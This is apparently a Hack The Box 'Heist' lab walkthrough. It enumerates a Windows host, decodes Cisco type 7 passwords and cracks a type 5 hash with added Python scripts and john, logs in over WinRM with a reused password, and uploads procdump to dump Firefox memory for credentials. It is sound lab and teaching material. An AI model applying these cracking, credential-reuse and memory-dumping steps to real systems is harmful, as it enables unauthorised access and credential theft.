HTB Heist

$nmap -sC -sV -oA all -vv -p- 10.10.10.149

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 16:48 CET
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:48
Completed NSE at 16:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:48
Completed NSE at 16:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:48
Completed NSE at 16:48, 0.00s elapsed
Initiating Ping Scan at 16:48
Scanning 10.10.10.149 [2 ports]
Completed Ping Scan at 16:48, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:48
Completed Parallel DNS resolution of 1 host. at 16:48, 0.01s elapsed
Initiating Connect Scan at 16:48
Scanning 10.10.10.149 [65535 ports]
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Discovered open port 49669/tcp on 10.10.10.149
Increasing send delay for 10.10.10.149 from 0 to 5 due to 20 out of 66 dropped probes since last increase.
Stats: 0:04:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Discovered open port 5985/tcp on 10.10.10.149
Connect Scan Timing: About 92.95% done; ETC: 16:58 (0:00:43 remaining)
Completed Connect Scan at 16:58, 617.22s elapsed (65535 total ports)
Initiating Service scan at 16:58
Scanning 5 services on 10.10.10.149
Stats: 0:11:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 16:59 (0:00:11 remaining)
Completed Service scan at 16:59, 55.37s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.10.149.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:59
NSE Timing: About 99.85% done; ETC: 16:59 (0:00:00 remaining)
Completed NSE at 17:00, 40.63s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.66s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Nmap scan report for 10.10.10.149
Host is up, received syn-ack (0.070s latency).
Scanned at 2020-12-16 16:48:11 CET for 714s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 54667/tcp): CLEAN (Timeout)
|   Check 2 (port 48515/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 28163/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-16T15:59:26
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 714.41 seconds

$gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.149
[+] Threads:        10
[+] Wordlist:       /home/ruben/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/12/16 22:25:14 Starting gobuster
===============================================================
http://10.10.10.149/images (Status: 301)
http://10.10.10.149/js (Status: 301)
http://10.10.10.149/css (Status: 301)
http://10.10.10.149/Images (Status: 301)
http://10.10.10.149/attachments (Status: 301)
http://10.10.10.149/CSS (Status: 301)
http://10.10.10.149/JS (Status: 301)
http://10.10.10.149/Js (Status: 301)
http://10.10.10.149/Css (Status: 301)
http://10.10.10.149/IMAGES (Status: 301)
http://10.10.10.149/Attachments (Status: 301)
[ERROR] 2020/12/16 22:27:36 [!] parse http://10.10.10.149/error_log: net/url: invalid control character in URL

$gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.149
[+] Threads:        10
[+] Wordlist:       /home/ruben/tools/SecLists/Discovery/Web-Content/raft-large-files.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/12/16 22:40:49 Starting gobuster
===============================================================
http://10.10.10.149/index.php (Status: 302)
http://10.10.10.149/login.php (Status: 200)
http://10.10.10.149/. (Status: 302)
http://10.10.10.149/errorpage.php (Status: 200)
http://10.10.10.149/Login.php (Status: 200)
http://10.10.10.149/Index.php (Status: 302)
[ERROR] 2020/12/16 22:43:15 [!] parse http://10.10.10.149/directory             e.g.: net/url: invalid control character in URL
http://10.10.10.149/index.Php (Status: 302)
===============================================================
2020/12/16 22:44:18 Finished
===============================================================

Accessing http://10.10.10.149/login.php

There is a «Login as Guest» option.

http://10.10.10.149/issues.php

There is an «Attachment» link.

http://10.10.10.149/attachments/config.txt

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

  • The issue message on the site talks about a Cisco router.
  • The poster, Hazard, asks for a user account to be created for him.
  • So «hazard» is probably a username on the box.
  • We should test the admin credentials we've just found.
  • Logging in to the site requires an email address.
  • This file contains two password hashes for the Cisco router.

Searching for Cisco password types, we find:

https://learningnetwork.cisco.com/s/article/cisco-routers-password-types

Type 7 passwords are reversible obfuscation rather than hashes, so an online tool decodes them directly:

https://www.ifm.net.nz/cookbooks/passwordcracker.html

So,

username = rout3r
password = $uperP@ssword

and

username = admin 
password = Q4)sJu\Y8qz*A3?d
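The decoding the online tool performs is simple enough to do locally, and doing it yourself means the router config never leaves your machine. The following Python script is an added example, not part of the original writeup or of any Cisco tool: it implements the type 7 XOR scheme (the fixed key string is the well-known constant every public decoder uses) and walks a config looking for `username ... password 7` and `enable secret/password` lines, decoding type 7 values on the spot and flagging type 5 hashes as needing offline work or, better, rotation. The sample config embedded in it is constructed from the credential lines of config.txt above.

```python
import re

# Cisco's type 7 "encryption" is a fixed-key XOR stream; this is the
# well-known constant key used by every public decoder.
_TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(encoded: str) -> str:
    """Reverse a Cisco type 7 password string.

    Format: two decimal digits giving the starting offset into the key,
    followed by hex pairs, each XORed with the next key byte.
    """
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("type 7 string must be 2 offset digits + hex pairs")
    offset = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    out = bytearray()
    for i, byte in enumerate(data):
        key_byte = _TYPE7_KEY[(offset + i) % len(_TYPE7_KEY)]
        out.append(byte ^ key_byte)
    return out.decode("latin-1")


# 'username NAME [privilege N] password TYPE VALUE' and 'enable secret|password TYPE VALUE'
_USER_RE = re.compile(
    r"^\s*username\s+(\S+)(?:\s+privilege\s+\d+)?\s+password\s+(\d)\s+(\S+)"
)
_ENABLE_RE = re.compile(r"^\s*enable\s+(secret|password)\s+(\d)\s+(\S+)")


def _finding(where: str, ptype: str, value: str) -> dict:
    finding = {"where": where, "type": int(ptype), "stored": value, "plaintext": None}
    if ptype == "7":
        finding["plaintext"] = decode_type7(value)
    return finding


def audit_config(config_text: str) -> list:
    """Walk a running-config and report every stored credential.

    Type 7 values are decoded (they are obfuscated, not hashed); type 5
    (md5crypt) and other types are reported with their type number so a
    reviewer knows what still needs an offline crack or a rotation.
    """
    findings = []
    for line in config_text.splitlines():
        m = _USER_RE.match(line)
        if m:
            name, ptype, value = m.groups()
            findings.append(_finding("username " + name, ptype, value))
            continue
        m = _ENABLE_RE.match(line)
        if m:
            kind, ptype, value = m.groups()
            findings.append(_finding("enable " + kind, ptype, value))
    return findings


# Constructed sample: the credential lines from the config.txt shown above.
SAMPLE_CONFIG = """\
hostname ios-1
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for item in audit_config(SAMPLE_CONFIG):
        if item["plaintext"] is not None:
            shown = item["plaintext"]
        else:
            shown = "(type %d, hashed: crack offline or rotate)" % item["type"]
        print("%-20s type %d: %s" % (item["where"], item["type"], shown))
```

Run it as a script to see the three findings; the two type 7 lines come back as the plaintexts listed above, and the `enable secret 5` line is reported as a hash that still needs cracking. `service password-encryption` only ever produces type 7, so the defensive takeaway is that it protects against shoulder-surfing and nothing else; `enable secret` with a type 8 or 9 hash is the current recommendation.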

There is another password, a type 5.

$nano type5.hash

$cat type5.hash

$1$pdQG$o8nrSzsGXeaduXrjlvKc91

$john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt type5.hash

Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)
1g 0:00:01:25 DONE (2020-12-17 10:21) 0.01168g/s 40950p/s 40950c/s 40950C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$john --format=md5crypt type5.hash --show

?:stealth1agent

1 password hash cracked, 0 left

So the type 5 password is stealth1agent.
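To see exactly what john is computing here, the following Python script is an added example, not from the writeup and not john's code: a pure-Python md5crypt, the crypt(3) `$1$` algorithm behind Cisco type 5 secrets, followed by a small wordlist check in the style of `--wordlist` mode. The candidate list is constructed for the example; the real run above used rockyou.txt.

```python
import hashlib
import hmac
from typing import Optional

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, n: int) -> str:
    """Emit n characters of the crypt base-64 alphabet, least significant first."""
    out = []
    for _ in range(n):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str) -> str:
    """Compute a crypt(3) md5crypt ("$1$") hash.

    Follows the original FreeBSD routine: a salted pre-hash, a
    length-dependent mixing step, then 1000 fixed rounds. Only ~1000 MD5
    calls per guess is why john gets through ~40k candidates/s above.
    """
    pw = password.encode()
    salt_b = salt.encode()[:8]  # crypt truncates salts to 8 bytes
    magic = b"$1$"

    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    for i in range(len(pw), 0, -16):
        ctx.update(alt[:min(16, i)])
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(salt_b)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()

    encoded = (
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
        + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
        + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
        + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
        + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
        + _to64(final[11], 2)
    )
    return "$1$" + salt_b.decode() + "$" + encoded


def verify_type5(candidate: str, stored: str) -> bool:
    """Check one candidate against a stored $1$salt$hash string."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an md5crypt ($1$) hash")
    return hmac.compare_digest(md5crypt(candidate, parts[2]), stored)


def first_match(stored: str, candidates) -> Optional[str]:
    """Tiny wordlist check: return the first candidate that matches, else None."""
    for word in candidates:
        if verify_type5(word, stored):
            return word
    return None


# The enable secret from config.txt; the candidate list is constructed.
ENABLE_SECRET = "$1$pdQG$o8nrSzsGXeaduXrjlvKc91"
CANDIDATES = ["password", "cisco123", "stealthy001", "stealth1agent", "steak7893"]

if __name__ == "__main__":
    print("match:", first_match(ENABLE_SECRET, CANDIDATES))
```

Two things worth noticing when reading it: the salt is only 4 characters here (crypt allows up to 8), and 1000 rounds of MD5 were a deliberate slowdown in the 1990s but are nowhere near enough today, which is why a dictionary word with a digit substitution falls in under two minutes on two CPU threads.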

More information on Cisco Passwords can be found here:

https://www.cisco.com/c/en/us/support/docs/security-vpn/remote-authentication-dial-user-service-radius/107614-64.html

https://community.cisco.com/t5/networking-documents/understanding-the-differences-between-the-cisco-password-secret/ta-p/3163238

https://learningnetwork.cisco.com/s/article/cisco-routers-password-types

CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.

CME can be used to test (spray) the credentials we found against SMB.
(https://github.com/byt3bl33d3r/CrackMapExec)

Installation:

$python3 -m pip install pipx

Collecting pipx
  Downloading pipx-0.15.6.0-py3-none-any.whl (43 kB)
     |████████████████████████████████| 43 kB 925 kB/s 
Requirement already satisfied: packaging>=20.0 in /usr/lib/python3/dist-packages (from pipx) (20.4)
Collecting userpath>=1.4.1
  Downloading userpath-1.4.1-py2.py3-none-any.whl (14 kB)
Collecting argcomplete<2.0,>=1.9.4
  Downloading argcomplete-1.12.2-py2.py3-none-any.whl (38 kB)
Requirement already satisfied: click in /usr/lib/python3/dist-packages (from userpath>=1.4.1->pipx) (7.1.2)
Requirement already satisfied: distro; platform_system == "Linux" in /usr/lib/python3/dist-packages (from userpath>=1.4.1->pipx) (1.5.0)
Installing collected packages: userpath, argcomplete, pipx
Successfully installed argcomplete-1.12.2 pipx-0.15.6.0 userpath-1.4.1

$pipx ensurepath

/home/ruben/.local/bin is already in PATH.

All pipx binary directories have been added to PATH. If you are sure
you want to proceed, try again with the '--force' flag.

Otherwise pipx is ready to go! ✨ 🌟 ✨

$pipx install crackmapexec

The virtual environment was not created successfully because ensurepip is not
available.  On Debian/Ubuntu systems, you need to install the python3-venv
package using the following command.

    apt-get install python3-venv

You may need to use sudo with that command.  After installing the python3-venv
package, recreate your virtual environment.

Failing command: ['/home/ruben/.local/pipx/shared/bin/python3', '-Im', 'ensurepip', '--upgrade', '--default-pip']

'/usr/bin/python3 -m venv --clear /home/ruben/.local/pipx/shared' failed

$sudo apt-get install python3-venv

[sudo] password for ruben: 
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
  dcraw flac libdbd-sqlite3-perl libgvm11 libhtml-linkextractor-perl libisl22 libjpeg-turbo-progs liblwp-protocol-socks-perl libndpi2.6 libout123-0 libperl5.30 libpython3.8 libpython3.8-dev
  libre2-8 librecode0 libstd-rust-1.47 libsyn123-0 libturbojpeg0 libxcb-util0 libxenmisc4.11 mpg123 php-sqlite3 php7.4-sqlite3 python3.8-dev recode
Utilice «sudo apt autoremove» para eliminarlos.
Se instalarán los siguientes paquetes adicionales:
  python3.9-venv
Se instalarán los siguientes paquetes NUEVOS:
  python3-venv python3.9-venv
0 actualizados, 2 nuevos se instalarán, 0 para eliminar y 1 no actualizados.
Se necesita descargar 6.500 B de archivos.
Se utilizarán 33,8 kB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n] 
Des:1 https://ftp.halifax.rwth-aachen.de/parrotsec rolling/main amd64 python3.9-venv amd64 3.9.0-5 [5.392 B]
Des:2 https://ftp-stud.hs-esslingen.de/Mirrors/archive.parrotsec.org rolling/main amd64 python3-venv amd64 3.9.0-4 [1.108 B]
Descargados 6.500 B en 1s (6.238 B/s)      
Seleccionando el paquete python3.9-venv previamente no seleccionado.
(Leyendo la base de datos ... 514062 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../python3.9-venv_3.9.0-5_amd64.deb ...
Desempaquetando python3.9-venv (3.9.0-5) ...
Seleccionando el paquete python3-venv previamente no seleccionado.
Preparando para desempaquetar .../python3-venv_3.9.0-4_amd64.deb ...
Desempaquetando python3-venv (3.9.0-4) ...
Configurando python3.9-venv (3.9.0-5) ...
Configurando python3-venv (3.9.0-4) ...
Scanning application launchers
Removing duplicate launchers or broken launchers
Launchers are updated

$pipx install crackmapexec

⚠️  Note: cmedb was already on your PATH at /usr/bin/cmedb
⚠️  Note: crackmapexec was already on your PATH at /usr/bin/crackmapexec
  installed package crackmapexec 5.1.1, Python 3.9.0+
  These apps are now globally available
    - cme
    - cmedb
    - crackmapexec
done! ✨ 🌟 ✨

CrackMapExec documentation: 

https://mpgn.gitbook.io/crackmapexec/

The admin password recovered from the router config is reused by the local user Chase, and WinRM is listening on port 5985, so we can use evil-winrm to obtain a shell.

$evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>

Evil-WinRM PS C:\Users\Chase\Desktop> dir

Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

Evil-WinRM PS C:\Users\Chase\Desktop> type user.txt

a127XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Evil-WinRM PS C:\Users\Chase\Desktop> type todo.txt

Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

$evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>

Evil-WinRM PS C:\Users\Chase\Documents> hostname

SupportDesk

Evil-WinRM PS C:\Users\Chase\Documents> whoami

supportdesk\chase

Evil-WinRM PS C:\Users\Chase\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Chase                    DefaultAccount
Guest                    Hazard                   Jason
support                  WDAGUtilityAccount
The command completed with one or more errors.

Evil-WinRM PS C:\Users\Chase\Documents> net user Chase

User name                    Chase
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/22/2019 8:20:32 AM
Password expires             Never
Password changeable          4/22/2019 8:20:32 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/17/2020 4:43:58 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users
Global Group memberships     *None
The command completed successfully.

Evil-WinRM PS C:\Users\Chase\Documents> net user Hazard

User name                    Hazard
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/21/2019 5:15:19 PM
Password expires             Never
Password changeable          4/21/2019 5:15:19 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/17/2020 4:44:15 PM

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

Evil-WinRM PS C:\Users\Chase\Documents> net user Jason

User name                    Jason
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/21/2019 5:18:29 PM
Password expires             Never
Password changeable          4/21/2019 5:18:29 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.

Evil-WinRM PS C:\Users\Chase\Documents> netstat -ano

 Active Connections

Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       924
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       484
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1084
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1472
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2552
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       648
  TCP    10.10.10.149:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.149:5985      10.10.14.12:36196      TIME_WAIT       0
  TCP    10.10.10.149:5985      10.10.14.12:36200      TIME_WAIT       0
  TCP    10.10.10.149:5985      10.10.14.12:36204      TIME_WAIT       0
  TCP    10.10.10.149:5985      10.10.14.12:36208      TIME_WAIT       0
  TCP    10.10.10.149:5985      10.10.14.12:36210      ESTABLISHED     4
  TCP    127.0.0.1:49672        127.0.0.1:49673        ESTABLISHED     6712
  TCP    127.0.0.1:49673        127.0.0.1:49672        ESTABLISHED     6712
  TCP    127.0.0.1:49674        127.0.0.1:49675        ESTABLISHED     7096
  TCP    127.0.0.1:49675        127.0.0.1:49674        ESTABLISHED     7096
  TCP    127.0.0.1:49677        127.0.0.1:49678        ESTABLISHED     4900
  TCP    127.0.0.1:49678        127.0.0.1:49677        ESTABLISHED     4900
  TCP    127.0.0.1:49680        127.0.0.1:49681        ESTABLISHED     6628
  TCP    127.0.0.1:49681        127.0.0.1:49680        ESTABLISHED     6628
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       924
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       484
  TCP    [::]:49665             [::]:0                 LISTENING       1084
  TCP    [::]:49666             [::]:0                 LISTENING       1472
  TCP    [::]:49667             [::]:0                 LISTENING       2552
  TCP    [::]:49668             [::]:0                 LISTENING       632
  TCP    [::]:49669             [::]:0                 LISTENING       648
  UDP    0.0.0.0:123            *:*                                    2844
  UDP    0.0.0.0:500            *:*                                    2736
  UDP    0.0.0.0:4500           *:*                                    2736
  UDP    0.0.0.0:5353           *:*                                    1572
  UDP    0.0.0.0:5355           *:*                                    1572
  UDP    0.0.0.0:56571          *:*                                    1572
  UDP    0.0.0.0:59029          *:*                                    1572
  UDP    10.10.10.149:137       *:*                                    4
  UDP    10.10.10.149:138       *:*                                    4
  UDP    127.0.0.1:54798        *:*                                    3000
  UDP    [::]:123               *:*                                    2844
  UDP    [::]:500               *:*                                    2736
  UDP    [::]:4500              *:*                                    2736
  UDP    [::]:5353              *:*                                    1572
  UDP    [::]:5355              *:*                                    1572
  UDP    [::]:56571             *:*                                    1572
  UDP    [::]:59029             *:*                                    1572

Evil-WinRM PS C:\Users\Chase\Documents> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    475      18     2300       5448               408   0 csrss
    296      17     2392       5340               504   1 csrss
    358      15     3532      14160              5436   1 ctfmon
    255      14     3980      13452              3968   0 dllhost
    166       9     1840       9796       0.17   5228   1 dllhost
    620      35    33732      60308                72   1 dwm
   1489      58    23932      78868              5656   1 explorer
    390      40   114248     145892      51.83   4900   1 firefox
    358      26    16436      37568       0.53   6628   1 firefox
   1156      77   177968     220196      34.91   6712   1 firefox
    345      20    10620      38576       0.44   6836   1 firefox
    407      31    16948      62704       2.52   7096   1 firefox
     49       6     1800       4680               824   1 fontdrvhost
     49       6     1440       3680               832   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    997      24     6316      15580               648   0 lsass
    227      13     3088      10296              4276   0 msdtc
    566      61   131096     124756              2944   0 MsMpEng
      0      13      340      74032               104   0 Registry
    274      14     3132      15332               420   1 RuntimeBroker
    145       8     1644       7308              2252   1 RuntimeBroker
    316      17    19844      32236              4848   1 RuntimeBroker
    675      32    19756      62012              1964   1 SearchUI
    540      11     5424       9996               632   0 services
    716      30    15532      51068              6072   1 ShellExperienceHost
    438      17     4924      23532              4944   1 sihost
     53       3      528       1224               328   0 smss
    475      23     5832      16324              2552   0 spoolsv
    285      13     4112      11344               364   0 svchost
    115       7     1240       5272               372   0 svchost
    203      12     2088       9588               396   0 svchost
    359      22    16352      18460               496   0 svchost
    149       9     1740      11524               716   0 svchost
     85       5      892       3904               776   0 svchost
    860      21     7304      22536               800   0 svchost
    163       9     3184       7736               916   0 svchost
    860      16     5404      11944               924   0 svchost
    253      10     2056       7748               968   0 svchost
    386      13    12128      15544              1084   0 svchost
    121      15     3560       7600              1184   0 svchost
    140       7     1328       5712              1192   0 svchost
    188       9     1816       7480              1240   0 svchost
    214       9     2276       7592              1268   0 svchost
    232      12     2500      11176              1320   0 svchost
    156       7     1200       5604              1336   0 svchost
    433       9     3000       9108              1348   0 svchost
    345      16     4180      11432              1452   0 svchost
    381      18     5568      14524              1472   0 svchost
    171      11     1800       7900              1492   0 svchost
    302      13     2004       8676              1564   0 svchost
    239      14     3236       8528              1572   0 svchost
    321      10     2652       8468              1664   0 svchost
    193      12     2188      12028              1672   0 svchost
    163      10     1904       6796              1780   0 svchost
    159       9     2244       7468              1896   0 svchost
    227      11     2836      10920              1904   0 svchost
    402      32     8812      16948              1928   0 svchost
    198      11     2004       8092              1984   0 svchost
    239      11     2588       9936              2020   0 svchost
    417      19    15096      32152              2220   0 svchost
    166      12     3940      10760              2624   0 svchost
    235      25     3352      12520              2640   0 svchost
    469      20    13360      28156              2648   0 svchost
    374      15    12404      21712              2680   0 svchost
    137       9     1640       6584              2712   0 svchost
    140       8     1528       6172              2728   0 svchost
    265      13     2588       7908              2736   0 svchost
    126       7     1216       5368              2768   0 svchost
    208      11     2412       8468              2796   0 svchost
    213      12     1864       7468              2844   0 svchost
    233      14     4652      11836              2876   0 svchost
    466      18     3344      11792              3000   0 svchost
    169      10     2172      13252              3008   0 svchost
    274      22     4032      12916              3020   0 svchost
    386      23     3432      12336              3256   0 svchost
    209      15     6352      10568              4516   0 svchost
    366      18     5700      26372              4644   1 svchost
    233      12     3080      13516              4824   1 svchost
    206      11     2996      11992              5180   0 svchost
    161       9     4700      12116              5344   0 svchost
    175       9     1496       7276              5384   0 svchost
    251      14     3184      13684              5476   0 svchost
    308      20     9292      15128              5496   0 svchost
    128       7     1264       5704              6636   0 svchost
    251      13     3440      12640              6800   0 svchost
    168      11     2500      13208              7036   0 svchost
   1933       0      192        156                 4   0 System
    211      21     4696      13492              5080   1 taskhostw
    298      18     5188      15976              6304   1 taskhostw
    178      12     3204      10400              2788   0 VGAuthService
    384      22     9904      22708              2812   0 vmtoolsd
    245      18     3920      15072              6404   1 vmtoolsd
    175      11     1500       7000               484   0 wininit
    286      13     2736      12864               560   1 winlogon
    347      16    10916      20036              2764   0 WmiPrvSE
    707      27    77860      96360       2.20   4112   0 wsmprovhost

Listing the running processes we can see several Firefox processes.

Since the to-do note says to keep checking the issues list, which is a web page, Chase probably has Firefox open on it, and the browser's memory may hold whatever he typed into the site.

We can dump the memory of a Firefox process with ProcDump.
(https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)

Download the program and upload it to the box.

Evil-WinRM PS C:\Users\Chase\Documents> upload Procdump/procdump64.exe

Info: Uploading Procdump/procdump64.exe to C:\Users\Chase\Documents\procdump64.exe
Data: 513184 bytes of 513184 bytes copied
Info: Upload successful!

Evil-WinRM PS C:\Users\Chase\Documents> ./procdump64.exe 4900

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[20:55:16] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_201217_205516.dmp
